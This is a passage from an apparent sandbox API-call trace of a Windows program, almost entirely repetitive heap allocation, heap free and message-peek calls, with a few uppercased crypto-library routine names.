out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0256.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0256.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0256.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0256.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0256.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2e910d8 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0256.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2ea2e90 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e910d8 | out: hHeap=0x970000) returned 1 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.621] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.695] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0256.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.695] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0256.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0256.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0256.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0256.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.697] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0256.697] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0256.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0256.697] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0256.698] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0256.698] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.698] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2e910d8 [0256.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0256.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2eb4c48 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e910d8 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0256.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2e910d8 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb4c48 | out: hHeap=0x970000) returned 1 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2eb4c48 [0256.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e910d8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0256.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: 